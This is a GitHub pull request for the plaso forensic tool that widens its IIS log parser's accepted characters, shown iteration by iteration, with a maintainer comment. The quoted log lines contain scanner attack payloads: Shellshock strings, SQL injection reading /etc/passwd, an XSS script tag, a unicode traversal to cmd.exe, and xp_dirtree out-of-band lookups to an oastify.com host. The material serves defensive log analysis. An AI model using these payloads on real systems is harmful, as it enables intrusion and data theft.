Skip to content

Further IIS parsing improvements#4921

Open
pyllyukko wants to merge 1 commit intolog2timeline:mainfrom
pyllyukko:iis-improvements
Open

Further IIS parsing improvements#4921
pyllyukko wants to merge 1 commit intolog2timeline:mainfrom
pyllyukko:iis-improvements

Conversation

@pyllyukko
Copy link
Contributor

@pyllyukko pyllyukko commented Nov 12, 2024

Ran a few scanners against vanilla IIS running in Windows Server 2022 and made sure everything parses.

Details:

Iteration 1

**************************** Extraction warning: 0 *****************************
           Message : unable to parse log line: 20 "2024-11-11 18:59:21
                     10.0.2.15 GET /1UNkBV0Q.* - 80 - 10.0.2.15
                     Mozilla/5.0+(W..."
      Parser chain : text/winiis
Path specification : type: OS, location: /data/evidences/u_ex241111.log
--------------------------------------------------------------------------------

Add * to _URI_SAFE_CHARACTERS.

Iteration 2

**************************** Extraction warning: 0 *****************************
           Message : unable to parse log line: 49 "2024-11-11 18:59:21
                     10.0.2.15 GET /1UNkBV0Q.php~ - 80 - 10.0.2.15
                     Mozilla/5.0..."
      Parser chain : text/winiis
Path specification : type: OS, location: /data/u_ex241111.log
--------------------------------------------------------------------------------

Add ~ to _URI_SAFE_CHARACTERS.

Iteration 3

**************************** Extraction warning: 0 *****************************
           Message : unable to parse log line: 179 "2024-11-11 18:59:21
                     10.0.2.15 GET /1UNkBV0Q.bat|dir - 80 - 10.0.2.15
                     Mozilla/..."
      Parser chain : text/winiis
Path specification : type: OS, location: /data/u_ex241111.log
--------------------------------------------------------------------------------

Add | to _URI_SAFE_CHARACTERS.

Iteration 4

**************************** Extraction warning: 0 *****************************
           Message : unable to parse log line: 802 "2024-11-11 18:59:21
                     10.0.2.15 GET / - 80 - 10.0.2.15
                     ()+{+:;+};+echo+93e4r0-C..."
      Parser chain : text/winiis
Path specification : type: OS, location: /data/u_ex241111.log
--------------------------------------------------------------------------------

Request:

2024-11-11 18:59:21 10.0.2.15 GET       /           -            80     -           10.0.2.15 ()+{+:;+};+echo+93e4r0-CVE-2014-6271:+true;echo;echo; ()+{+_;+}+>_[$($())]+{+echo+93e4r0-CVE-2014-6278:+true;+echo;echo;+} 200       0            0               0
date       time     s-ip      cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip      cs(User-Agent)                                        cs(Referer)                                                          sc-status sc-substatus sc-win32-status time-taken
  • Add []<>{}$ to _URI_SAFE_CHARACTERS
    • Remove [] from _UA
    • Remove $ from _URI_STEM
    • Remove {} from _COOKIE
    • Remove {}|, ~[], <> & $ from _QUERY

Iteration 5

**************************** Extraction warning: 0 *****************************
           Message : unable to parse log line: 1328 "2024-11-11 18:59:21
                     10.0.2.15 GET
                     /site/'+UNION+ALL+SELECT+FileToClob('/etc/p..."
      Parser chain : text/winiis
Path specification : type: OS, location: /data/u_ex241111.log
--------------------------------------------------------------------------------

Request:

2024-11-11 18:59:21 10.0.2.15 GET       /site/'+UNION+ALL+SELECT+FileToClob('/etc/passwd','server')::html,0+FROM+sysusers+WHERE+username=USER+--/.html -            80     -           10.0.2.15 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/74.0.3729.169+Safari/537.36 -           404       0            2               0
date       time     s-ip      cs-method cs-uri-stem                                                                                                    cs-uri-query s-port cs-username c-ip      cs(User-Agent)                                                                                                      cs(Referer) sc-status sc-substatus sc-win32-status time-taken
  • Added \' to _URI_SAFE_CHARACTERS
    • Remove \' from _QUERY

Iteration 6

**************************** Extraction warning: 0 *****************************
           Message : unable to parse log line: 1517 "2024-11-11 18:59:21
                     10.0.2.15 GET /<script>alert("xss")</script>/index.html
                     -..."
      Parser chain : text/winiis
Path specification : type: OS, location: /data/u_ex241111.log
--------------------------------------------------------------------------------
  • Added " to _URI_SAFE_CHARACTERS
    • Removed " from _COOKIE
    • Removed " from _QUERY

Iteration 7

**************************** Extraction warning: 0 *****************************
           Message : unable to parse log line: 1546 "2024-11-11 18:59:21
                     10.0.2.15 GET /chat/!nicks.txt - 80 - 10.0.2.15
                     Mozilla/5..."
      Parser chain : text/winiis
Path specification : type: OS, location: /data/u_ex241111.log
--------------------------------------------------------------------------------

Added ! to _URI_SAFE_CHARACTERS

Iteration 8

**************************** Extraction warning: 0 *****************************
           Message : unable to parse log line: 2555 "2024-11-11 18:59:21
                     10.0.2.15 GET /forum.asp
                     n=%60/etc/passwd%60|41|80040e14|..."
      Parser chain : text/winiis
Path specification : type: OS, location: /data/u_ex241111.log
--------------------------------------------------------------------------------

Request:

date       time     s-ip      cs-method cs-uri-stem cs-uri-query                                                                                                                s-port cs-username c-ip      cs(User-Agent)                                                                                                      cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2024-11-11 18:59:21 10.0.2.15 GET       /forum.asp  n=%60/etc/passwd%60|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;`&#039;. 80     -           10.0.2.15 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/74.0.3729.169+Safari/537.36 -           404       0            2               0
  • Added "`" to _URI_SAFE_CHARACTERS
    • Removed it from _QUERY
  • Added # to _URI_SAFE_CHARACTERS

Iteration 9

**************************** Extraction warning: 0 *****************************
           Message : unable to parse log line: 3215 "2024-11-11 18:59:21
                     10.0.2.15 GET /certsrv/..À¯../winnt/system32/cmd.exe
                     /c+d..."
      Parser chain : text/winiis
Path specification : type: OS, location: /data/u_ex241111.log
--------------------------------------------------------------------------------

Request:

2024-11-11 18:59:21 10.0.2.15 GET /certsrv/..À¯../winnt/system32/cmd.exe /c+dir 80 - 10.0.2.15 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/74.0.3729.169+Safari/537.36 - 404 0 2 0

Added À¯ to _URI_SAFE_CHARACTERS

Iteration 10

**************************** Extraction warning: 0 *****************************
           Message : unable to parse log line: 6417 "2024-11-11 18:59:21
                     10.0.2.15 GET /administraçao.php - 80 - 10.0.2.15
                     Mozill..."
      Parser chain : text/winiis
Path specification : type: OS, location: /data/u_ex241111.log
--------------------------------------------------------------------------------

Added ç to _URI_SAFE_CHARACTERS

Iteration 11

**************************** Extraction warning: 0 *****************************
           Message : unable to parse log line: 6443 "2024-11-11 18:59:21
                     10.0.2.15 GET /adminisztrátora.php - 80 - 10.0.2.15
                     Mozi..."
      Parser chain : text/winiis
Path specification : type: OS, location: /data/u_ex241111.log
--------------------------------------------------------------------------------

Added ¡ to _URI_SAFE_CHARACTERS

Iteration 12

**************************** Extraction warning: 0 *****************************
           Message : unable to parse log line: 8170 "2024-11-11 18:59:21
                     10.0.2.15 GET / - 80 - 10.0.2.15
                     Mozilla/5.0+(X11;+Linux+..."
      Parser chain : text/winiis
Path specification : type: OS, location: /data/u_ex241111.log
--------------------------------------------------------------------------------

Request:

2024-11-11 18:59:21 10.0.2.15 GET       /           -            80     -           10.0.2.15 Mozilla/5.0+(X11;+Linux+x86_64;+rv:128.0)+Gecko/20100101+Firefox/128.0;declare+@q+varchar(99);set+@q='\\4w1vx73x693ltlawm13122r0wr2kqae14pzcp0e.oasti'+'fy.com\inx';+exec+master.dbo.xp_dirtree+@q;-- -           200       0            0               0
date       time     s-ip      cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip      cs(User-Agent)                                                                                                                                                                                        cs(Referer) sc-status sc-substatus sc-win32-status time-taken
  • Added @\\ to _UA

Iteration 13

**************************** Extraction warning: 0 *****************************
           Message : unable to parse log line: 8209 "2024-11-11 18:59:21
                     10.0.2.15 GET / - 80 - 10.0.2.15
                     Mozilla/5.0+(X11;+Linux+..."
      Parser chain : text/winiis
Path specification : type: OS, location: /data/u_ex241111.log
--------------------------------------------------------------------------------

Request:

2024-11-11 18:59:21 10.0.2.15 GET       /           -            80     -           10.0.2.15 Mozilla/5.0+(X11;+Linux+x86_64;+rv:128.0)+Gecko/20100101+Firefox/128.0 https://example.com/;declare+@q+varchar(99);set+@q='\\y21p319rc39fzfgqsv9v8wxu2l8ew4kvaj56wul.oasti'+'fy.com\zmv';+exec+master.dbo.xp_dirtree+@q;-- 200       0            0               0
date       time     s-ip      cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip      cs(User-Agent)                                                         cs(Referer)                                                                                                                                         sc-status sc-substatus sc-win32-status time-taken
  • Moved @\\ to _URI_SAFE_CHARACTERS
    • Removed from _UA, _COOKIE & _QUERY

Everything parses now.

************************* Events generated per parser **************************
Parser (plugin) name : Number of events
--------------------------------------------------------------------------------
            filestat : 3
              winiis : 8312
               Total : 8315
--------------------------------------------------------------------------------

@joachimmetz
Copy link
Member

joachimmetz commented Nov 16, 2024

@pyllyukko thanks for flagging, I'll take a closer look when time permits.

Added ç to _URI_SAFE_CHARACTERS

this looks like IIS handling Unicode characters in a non-URI safe manner, adding individual characters is going to be a whack-a-mole approach.

@joachimmetz joachimmetz mentioned this pull request Jan 24, 2026
Open
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Reviewers

No reviews

Assignees

No one assigned

Labels

None yet

Projects

None yet

Milestone

No milestone

Development

Successfully merging this pull request may close these issues.

2 participants

@pyllyukko @joachimmetz